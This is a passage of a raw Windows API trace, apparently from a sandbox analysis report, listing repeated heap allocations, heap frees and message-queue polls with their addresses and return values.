0xbfe1e0 [0257.583] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018d8 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6c0 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b88 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda600 [0257.584] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.584] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda690 | out: hHeap=0xbc0000) returned 1 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b68 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda690 | out: hHeap=0xbc0000) returned 1 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.584] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.584] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.584] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b28 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda690 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda618 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b68 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.585] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.585] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b38 [0257.585] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.585] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018f8 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b18 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018f8 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda630 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.586] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b18 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b28 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b48 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.586] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b38 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b38 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b48 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b28 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b18 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.586] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.586] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.586] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.587] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.587] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.587] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.587] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.587] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.588] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.588] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.588] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.588] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.588] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.589] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.589] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.589] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.589] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.589] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ce8 | out: hHeap=0xbc0000) returned 1 [0257.590] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01988 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b68 [0257.590] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b68 | out: hHeap=0xbc0000) returned 1 [0257.590] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 